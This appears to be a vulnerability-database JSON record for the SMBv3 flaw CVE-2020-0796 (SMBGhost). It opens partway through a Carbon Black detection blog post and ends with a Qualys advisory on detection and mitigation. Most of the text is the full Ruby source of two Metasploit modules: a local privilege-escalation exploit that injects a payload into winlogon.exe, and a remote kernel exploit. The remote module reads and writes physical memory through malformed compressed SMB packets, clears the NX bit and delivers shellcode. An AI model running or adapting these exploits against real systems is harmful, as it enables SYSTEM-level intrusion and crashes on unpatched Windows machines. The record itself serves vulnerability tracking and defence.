line.\n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_2.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_2.png>) \n\n\n_Figure 2: LiveResponse Eternal Darkness output_\n\n#### **CBC Audit and Remediation Query**\n\nAdditionally there is a new CBC Audit and Remediation search in the query catalog tiled _Windows SMBv3 Client/Server Remote Code Execution Vulnerability (CVE-2020-0796)_ which can be run across your environment to identify impacted hosts. This query will identify if a machine has active SMB shares, is running an OS version impacted by this vulnerability, check to see if the disabled compression mitigating keys are set, and see if the system is patched. CBC Audit and Remediation customers will be able to quickly quantify the level of impact this vulnerability has in their network.\n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_3.jpg)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_3.jpg>) \n\n\n_Figure 3: CBC Audit and Remediation CVE Search Results_\n\nThere is also an existing query in the CBC Audit and Remediation query catalog that can be used to detect rogue SMB shares within your network. You can find this query in the IT Hygiene portion of the catalog named Rogue Share Detection. It's recommended you run this query daily to have a constant heartbeat on active SMB shares in your network. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_4.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/Figure_4.png>) \n\n\n_Figure 4: CBC Audit and Remediation Rouge Share Search_\n\n#### **Enterprise EDR Queries**\n\nWe have also deployed detections to our enterprise EDR products that look for the disable compression key being modified and for modifications of Windows shares. We believe that attackers could set this key to turn off compensating controls in order to be successful in gaining remote access to systems prior to organizations patching their environment. Coupled with accessing Windows shares, an attacker would be able to successfully exercise lateral movement and execute arbitrary code.\n\n### **Helpful Links**\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>\n\n<https://www.kb.cert.org/vuls/id/872016/>\n\n[https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block](<https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block>)\n\n \n\nThe post [Threat Analysis: CVE-2020-0796 - EternalDarkness (ghostSMB)](<https://www.carbonblack.com/2020/03/17/threat-analysis-cve-2020-0796-eternaldarkness-ghostsmb/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-17T14:14:25", "type": "carbonblack", "title": "Threat Analysis: CVE-2020-0796 \u2013 EternalDarkness (ghostSMB)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-17T14:14:25", "id": "CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F", "href": "https://www.carbonblack.com/2020/03/17/threat-analysis-cve-2020-0796-eternaldarkness-ghostsmb/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-01-02T08:56:39", "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe.\n", "cvss3": {}, "published": "2020-04-02T21:22:00", "type": "metasploit", "title": "SMBv3 Compression Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0796_SMBGHOST-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2020_0796_smbghost/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'SMBv3 Compression Buffer Overflow',\n 'Description' => %q{\n A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit\n 'Manuel Blanco Paraj\u00f3n', # original LPE exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n # [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n [ 'CVE', '2020-0796' ],\n [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]\n ],\n 'DisclosureDate' => '2020-03-13',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => [ 'SMBGhost', 'CoronaBlue' ],\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ]\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)\n print_error('The exploit only supports Windows 10 versions 1903 - 1909')\n return CheckCode::Safe\n end\n\n disable_compression = registry_getvaldata('HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters', 'DisableCompression')\n if !disable_compression.nil? && disable_compression != 0\n print_error('The exploit requires compression to be enabled')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Reflectively injecting the exploit DLL and executing it...')\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2020_0796_smbghost.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-02T08:56:38", "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. Exploitation can take a few minutes as the necessary data is gathered.\n", "cvss3": {}, "published": "2021-04-09T18:15:05", "type": "metasploit", "title": "SMBv3 Compression Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2022-03-21T12:47:39", "id": "MSF:EXPLOIT-WINDOWS-SMB-CVE_2020_0796_SMBGHOST-", "href": "https://www.rapid7.com/db/modules/exploit/windows/smb/cve_2020_0796_smbghost/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n prepend Msf::Exploit::Remote::AutoCheck\n\n LZNT1 = RubySMB::Compression::LZNT1\n\n # KUSER_SHARED_DATA offsets, these are defined by the module and are therefore target independent\n KSD_VA_MAP = 0x800\n KSD_VA_PMDL = 0x900\n KSD_VA_SHELLCODE = 0x950 # needs to be the highest offset for #cleanup\n\n MAX_READ_RETRIES = 5\n WRITE_UNIT = 0xd0\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SMBv3 Compression Buffer Overflow',\n 'Description' => %q{\n A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code\n in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. Exploitation\n can take a few minutes as the necessary data is gathered.\n },\n 'Author' => [\n 'hugeh0ge', # Ricerca Security research, detailed technique description\n 'chompie1337', # PoC on which this module is based\n 'Spencer McIntyre', # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'CVE', '2020-0796' ],\n [ 'URL', 'https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html' ],\n [ 'URL', 'https://github.com/chompie1337/SMBGhost_RCE_PoC' ],\n # the rest are not cve-2020-0796 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],\n [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],\n [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],\n [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]\n ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 10\n },\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => 600,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' => [\n [\n 'Windows 10 v1903-1909 x64',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'OverflowSize' => 0x1100,\n 'LowStubFingerprint' => 0x1000600e9,\n 'KuserSharedData' => 0xfffff78000000000,\n # Offset(From,To) => Bytes\n 'Offset(HalpInterruptController,HalpApicRequestInterrupt)' => 0x78,\n 'Offset(LowStub,SelfVA)' => 0x78,\n 'Offset(LowStub,PML4)' => 0xa0,\n 'Offset(SrvnetBufferHdr,pMDL1)' => 0x38,\n 'Offset(SrvnetBufferHdr,pNetRawBuffer)' => 0x18\n }\n ]\n ],\n 'DisclosureDate' => '2020-03-13',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => [ 'SMBGhost', 'CoronaBlue' ],\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'RelatedModules' => [ 'exploit/windows/local/cve_2020_0796_smbghost' ],\n 'SideEffects' => []\n }\n )\n )\n register_options([Opt::RPORT(445),])\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true])\n ])\n end\n\n def check\n begin\n client = RubySMB::Client.new(\n RubySMB::Dispatcher::Socket.new(connect(false)),\n username: '',\n password: '',\n smb1: false,\n smb2: false,\n smb3: true\n )\n protocol = client.negotiate\n client.disconnect!\n rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError\n return CheckCode::Unknown\n rescue Errno::ECONNRESET\n return CheckCode::Unknown\n rescue ::Exception => e # rubocop:disable Lint/RescueException\n vprint_error(\"#{rhost}: #{e.class} #{e}\")\n return CheckCode::Unknown\n end\n\n return CheckCode::Safe unless protocol == 'SMB3'\n return CheckCode::Safe unless client.dialect == '0x0311'\n\n lznt1_algorithm = RubySMB::SMB2::CompressionCapabilities::COMPRESSION_ALGORITHM_MAP.key('LZNT1')\n return CheckCode::Safe unless client.server_compression_algorithms.include?(lznt1_algorithm)\n\n CheckCode::Detected\n end\n\n def smb_negotiate\n # need a custom negotiate function because the responses will be corrupt while reading memory\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n\n packet = RubySMB::SMB2::Packet::NegotiateRequest.new\n packet.client_guid = SecureRandom.random_bytes(16)\n packet.set_dialects((RubySMB::Client::SMB2_DIALECT_DEFAULT + RubySMB::Client::SMB3_DIALECT_DEFAULT).map { |d| d.to_i(16) })\n\n packet.capabilities.large_mtu = 1\n packet.capabilities.encryption = 1\n\n nc = RubySMB::SMB2::NegotiateContext.new(\n context_type: RubySMB::SMB2::NegotiateContext::SMB2_PREAUTH_INTEGRITY_CAPABILITIES\n )\n nc.data.hash_algorithms << RubySMB::SMB2::PreauthIntegrityCapabilities::SHA_512\n nc.data.salt = \"\\x00\" * 32\n packet.add_negotiate_context(nc)\n\n nc = RubySMB::SMB2::NegotiateContext.new(\n context_type: RubySMB::SMB2::NegotiateContext::SMB2_COMPRESSION_CAPABILITIES\n )\n nc.data.flags = 1\n nc.data.compression_algorithms << RubySMB::SMB2::CompressionCapabilities::LZNT1\n packet.add_negotiate_context(nc)\n\n dispatcher.send_packet(packet)\n dispatcher\n end\n\n def write_primitive(data, addr)\n dispatcher = smb_negotiate\n dispatcher.tcp_socket.get_once # disregard the response\n\n uncompressed_data = rand(0x41..0x5a).chr * (target['OverflowSize'] - data.length)\n uncompressed_data << \"\\x00\" * target['Offset(SrvnetBufferHdr,pNetRawBuffer)']\n uncompressed_data << [ addr ].pack('Q<')\n\n pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(\n original_compressed_segment_size: 0xffffffff,\n compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,\n offset: data.length,\n compressed_data: (data + LZNT1.compress(uncompressed_data)).bytes\n )\n dispatcher.send_packet(pkt)\n dispatcher.tcp_socket.close\n end\n\n def write_srvnet_buffer_hdr(data, offset)\n dispatcher = smb_negotiate\n dispatcher.tcp_socket.get_once # disregard the response\n\n dummy_data = rand(0x41..0x5a).chr * (target['OverflowSize'] + offset)\n pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(\n original_compressed_segment_size: 0xffffefff,\n compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,\n offset: dummy_data.length,\n compressed_data: (dummy_data + CorruptLZNT1.compress(data)).bytes\n )\n dispatcher.send_packet(pkt)\n dispatcher.tcp_socket.close\n end\n\n def read_primitive(phys_addr)\n value = @memory_cache[phys_addr]\n return value unless value.nil?\n\n vprint_status(\"Reading from physical memory at index: 0x#{phys_addr.to_s(16).rjust(16, '0')}\")\n fake_mdl = MDL.new(\n mdl_size: 0x48,\n mdl_flags: 0x5018,\n mapped_system_va: (target['KuserSharedData'] + KSD_VA_MAP),\n start_va: ((target['KuserSharedData'] + KSD_VA_MAP) & ~0xfff),\n byte_count: 600,\n byte_offset: ((phys_addr & 0xfff) + 0x4)\n )\n phys_addr_enc = (phys_addr & 0xfffffffffffff000) >> 12\n\n (MAX_READ_RETRIES * 2).times do |try|\n write_primitive(fake_mdl.to_binary_s + ([ phys_addr_enc ] * 3).pack('Q<*'), (target['KuserSharedData'] + KSD_VA_PMDL))\n write_srvnet_buffer_hdr([(target['KuserSharedData'] + KSD_VA_PMDL)].pack('Q<'), target['Offset(SrvnetBufferHdr,pMDL1)'])\n\n MAX_READ_RETRIES.times do |_|\n dispatcher = smb_negotiate\n blob = dispatcher.tcp_socket.get_once\n dispatcher.tcp_socket.close\n next '' if blob.nil?\n next if blob[4..7] == \"\\xfeSMB\".b\n\n @memory_cache[phys_addr] = blob\n return blob\n end\n sleep try**2\n end\n\n fail_with(Failure::Unknown, 'Failed to read physical memory')\n end\n\n def find_low_stub\n common = [0x13000].to_enum # try the most common value first\n all = (0x1000..0x100000).step(0x1000)\n (common + all).each do |index|\n buff = read_primitive(index)\n entry = buff.unpack('Q<').first\n next unless (entry & 0xffffffffffff00ff) == (target['LowStubFingerprint'] & 0xffffffffffff00ff)\n\n lowstub_va = buff[target['Offset(LowStub,SelfVA)']...(target['Offset(LowStub,SelfVA)'] + 8)].unpack('Q<').first\n print_status(\"Found low stub at physical address 0x#{index.to_s(16).rjust(16, '0')}, virtual address 0x#{lowstub_va.to_s(16).rjust(16, '0')}\")\n pml4 = buff[target['Offset(LowStub,PML4)']...(target['Offset(LowStub,PML4)'] + 8)].unpack('Q<').first\n print_status(\"Found PML4 at 0x#{pml4.to_s(16).rjust(16, '0')} \" + { 0x1aa000 => '(BIOS)', 0x1ad000 => '(UEFI)' }.fetch(pml4, ''))\n\n phal_heap = lowstub_va & 0xffffffffffff0000\n print_status(\"Found HAL heap at 0x#{phal_heap.to_s(16).rjust(16, '0')}\")\n\n return { pml4: pml4, phal_heap: phal_heap }\n end\n\n fail_with(Failure::Unknown, 'Failed to find the low stub')\n end\n\n def find_pml4_selfref(pointers)\n search_len = 0x1000\n index = pointers[:pml4]\n\n while search_len > 0\n buff = read_primitive(index)\n buff = buff[0...-(buff.length % 8)]\n buff.unpack('Q<*').each_with_index do |entry, i|\n entry &= 0xfffff000\n next unless entry == pointers[:pml4]\n\n selfref = ((index + (i * 8)) & 0xfff) >> 3\n pointers[:pml4_selfref] = selfref\n print_status(\"Found PML4 self-reference entry at 0x#{selfref.to_s(16).rjust(4, '0')}\")\n return pointers\n end\n search_len -= [buff.length, 8].max\n index += [buff.length, 8].max\n end\n\n fail_with(Failure::Unknown, 'Failed to leak the PML4 self reference')\n end\n\n def get_phys_addr(pointers, va_addr)\n pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\n pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\n pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\n pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\n\n pml4e = pointers[:pml4] + pml4_index * 8\n pdpt_buff = read_primitive(pml4e)\n\n pdpt = pdpt_buff.unpack('Q<').first & 0xfffff000\n pdpte = pdpt + pdpt_index * 8\n pdt_buff = read_primitive(pdpte)\n\n pdt = pdt_buff.unpack('Q<').first & 0xfffff000\n pdte = pdt + pdt_index * 8\n pt_buff = read_primitive(pdte)\n\n pt = pt_buff.unpack('Q<').first\n unless pt & (1 << 7) == 0\n return (pt & 0xfffff000) + (pt_index & 0xfff) * 0x1000 + (va_addr & 0xfff)\n end\n\n pt &= 0xfffff000\n pte = pt + pt_index * 8\n pte_buff = read_primitive(pte)\n (pte_buff.unpack('Q<').first & 0xfffff000) + (va_addr & 0xfff)\n end\n\n def disable_nx(pointers, addr)\n lb = (0xffff << 48) | (pointers[:pml4_selfref] << 39)\n ub = ((0xffff << 48) | (pointers[:pml4_selfref] << 39) + 0x8000000000 - 1) & 0xfffffffffffffff8\n pte_va = ((addr >> 9) | lb) & ub\n\n phys_addr = get_phys_addr(pointers, pte_va)\n orig_val = read_primitive(phys_addr).unpack1('Q<')\n overwrite_val = orig_val & ((1 << 63) - 1)\n write_primitive([ overwrite_val ].pack('Q<'), pte_va)\n { pte_va: pte_va, original: orig_val }\n end\n\n def search_hal_heap(pointers)\n va_cursor = pointers[:phal_heap]\n end_va = va_cursor + 0x20000\n\n while va_cursor < end_va\n phys_addr = get_phys_addr(pointers, va_cursor)\n buff = read_primitive(phys_addr)\n buff = buff[0...-(buff.length % 8)]\n values = buff.unpack('Q<*')\n window_size = 8 # using a sliding window to fingerprint the memory\n 0.upto(values.length - window_size) do |i| # TODO: if the heap structure exists over two pages, this will break\n va = va_cursor + (i * 8)\n window = values[i...(i + window_size)]\n next unless window[0...3].all? { |value| value & 0xfffff00000000000 == 0xfffff00000000000 }\n next unless window[4...8].all? { |value| value & 0xffffff0000000000 == 0xfffff80000000000 }\n next unless window[3].between?(0x20, 0x40)\n next unless (window[0] - window[2]).between?(0x80, 0x180)\n\n phalp_ari = read_primitive(get_phys_addr(pointers, va) + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']).unpack('Q<').first\n next if read_primitive(get_phys_addr(pointers, phalp_ari))[0...8] != \"\\x48\\x89\\x6c\\x24\\x20\\x56\\x41\\x54\" # mov qword ptr [rsp+20h], rbp; push rsi; push r12\n\n # looks legit (TM), lets hope for the best\n # use WinDBG to validate the hal!HalpInterruptController value manually\n # 0: kd> dq poi(hal!HalpInterruptController) L1\n pointers[:pHalpInterruptController] = va\n print_status(\"Found hal!HalpInterruptController at 0x#{va.to_s(16).rjust(16, '0')}\")\n\n # use WinDBG to validate the hal!HalpApicRequestInterrupt value manually\n # 0: kd> dq u poi(poi(hal!HalpInterruptController)+78) L1\n pointers[:pHalpApicRequestInterrupt] = phalp_ari\n print_status(\"Found hal!HalpApicRequestInterrupt at 0x#{phalp_ari.to_s(16).rjust(16, '0')}\")\n return pointers\n end\n\n va_cursor += buff.length\n end\n fail_with(Failure::Unknown, 'Failed to leak the address of hal!HalpInterruptController')\n end\n\n def build_shellcode(pointers)\n source = File.read(File.join(Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2020-0796', 'RCE', 'kernel_shellcode.asm'), mode: 'rb')\n edata = Metasm::Shellcode.assemble(Metasm::X64.new, source).encoded\n user_shellcode = payload.encoded\n edata.fixup 'PHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpApicRequestInterrupt]\n edata.fixup 'PPHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']\n edata.fixup 'USER_SHELLCODE_SIZE' => user_shellcode.length\n edata.data + user_shellcode\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute this module? There is a high probability that even when the exploit is\n successful the remote target will crash within about 90 minutes.\n\n Disable the DefangedMode option to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n fail_with(Failure::BadConfig, \"Incompatible payload: #{datastore['PAYLOAD']} (must be x64)\") unless payload.arch.include? ARCH_X64\n @memory_cache = {}\n @shellcode_length = 0\n pointers = find_low_stub\n pointers = find_pml4_selfref(pointers)\n pointers = search_hal_heap(pointers)\n\n @nx_info = disable_nx(pointers, target['KuserSharedData'])\n print_status('KUSER_SHARED_DATA PTE NX bit cleared!')\n\n shellcode = build_shellcode(pointers)\n vprint_status(\"Transferring #{shellcode.length} bytes of shellcode...\")\n @shellcode_length = shellcode.length\n write_bytes = 0\n while write_bytes < @shellcode_length\n write_sz = [WRITE_UNIT, @shellcode_length - write_bytes].min\n write_primitive(shellcode[write_bytes...(write_bytes + write_sz)], (target['KuserSharedData'] + KSD_VA_SHELLCODE) + write_bytes)\n write_bytes += write_sz\n end\n vprint_status('Transfer complete, hooking hal!HalpApicRequestInterrupt to trigger execution...')\n write_primitive([(target['KuserSharedData'] + KSD_VA_SHELLCODE)].pack('Q<'), pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)'])\n end\n\n def cleanup\n return unless @memory_cache&.present?\n\n if @nx_info&.present?\n print_status('Restoring the KUSER_SHARED_DATA PTE NX bit...')\n write_primitive([ @nx_info[:original] ].pack('Q<'), @nx_info[:pte_va])\n end\n\n # need to restore the contents of KUSER_SHARED_DATA to zero to avoid a bugcheck\n vprint_status('Cleaning up the contents of KUSER_SHARED_DATA...')\n start_va = target['KuserSharedData'] + KSD_VA_MAP - WRITE_UNIT\n end_va = target['KuserSharedData'] + KSD_VA_SHELLCODE + @shellcode_length\n (start_va..end_va).step(WRITE_UNIT).each do |cursor|\n write_primitive(\"\\x00\".b * [WRITE_UNIT, end_va - cursor].min, cursor)\n end\n end\n\n module CorruptLZNT1\n def self.compress(buf, chunk_size: 0x1000)\n out = ''\n until buf.empty?\n chunk = buf[0...chunk_size]\n compressed = LZNT1.compress_chunk(chunk)\n\n # always use the compressed chunk, even if it's larger\n out << [ 0xb000 | (compressed.length - 1) ].pack('v')\n out << compressed\n\n buf = buf[chunk_size..]\n break if buf.nil?\n end\n\n out << [ 0x1337 ].pack('v')\n out\n end\n end\n\n class MDL < BinData::Record\n # https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_MDL\n endian :little\n uint64 :next_mdl\n uint16 :mdl_size\n uint16 :mdl_flags\n uint16 :allocation_processor_number\n uint16 :reserved\n uint64 :process\n uint64 :mapped_system_va\n uint64 :start_va\n uint32 :byte_count\n uint32 :byte_offset\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/cve_2020_0796_smbghost.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2020-03-20T19:37:53", "description": "This month's [Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Microsoft disclosed a remote code execution vulnerability in SMB 3.1.1 (v3) protocol. Even though initial release of the Patch Tuesday did not mention this vulnerability, details of the issue (CVE-2020-0796) were published accidentally on another security vendor\u2019s blog. Microsoft published [security advisory ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) and [technical guidance](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) soon after the accidental disclosure of the vulnerability.\n\n**UPDATE March 12, 2020**: Microsoft updated [ ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) to include CVE-2020-0796 and released patches for affected Windows systems.\n\n### The Vulnerability\n\nA critical remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 protocol handles certain requests. An unauthenticated attacker could exploit the vulnerability to execute arbitrary code on SMB server by sending a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\n\n**Affected Operating Systems**\n\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n\nMicrosoft released patches and have provided workarounds in a [security advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005>): disable SMBv3 compression and block the 445 TCP port on client computers and firewalls to prevent attackers from exploiting the vulnerability.\n\n###### Exploits/PoC:\n\n**Update**: There were no reports of active exploitation or PoC available in public domain at the time of initial release of this post. \nOn March 12, [Kryptos Logic](<https://twitter.com/kryptoslogic/status/1238057276738592768>) published a proof-of-concept, demonstrating the use of exploit code to crash vulnerable hosts (Denial of Service). \nOn March 13, a POC was published on [GitHub](<https://github.com/eerykitty/CVE-2020-0796-PoC>) that explained how \"CVE-2020-0796 is caused by a lack of bounds checking in offset size, which is directly passed to several subroutines. Passing a large value causes buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.\"\n\nSystems with port 445 exposed to the Internet are at high risk for this vulnerability.\n\n### Detecting CVE-2020-0796 with Qualys VM\n\nQualys has issued QID 91614 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that covers CVE-2020-0796 across all impacted operating systems. This QID will be included in signature version VULNSIGS-2.4.837-4, and requires authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). Cloud Agents will automatically receive this new QID as part of manifest version 2.4.837.4-3. Details of the detection are also available at [Microsoft Security Alert: March 10, 2020](<https://www.qualys.com/research/security-alerts/2020-03-10/microsoft>).\n\n_QID 91614 : Microsoft Guidance for Disabling SMBv3 Compression Not Applied (ADV200005)_\n\nThis QID checks if SMBv3 is enabled on the host and if the following workaround is not applied -\n\n_\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameter\"; \nDisableCompression -Type DWORD -Value 1_\n\n**Update**: Qualys released QID 91616 to check for patches applied for CVE-2020-0796 across all impacted operating systems using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). All new changes are included in signature version 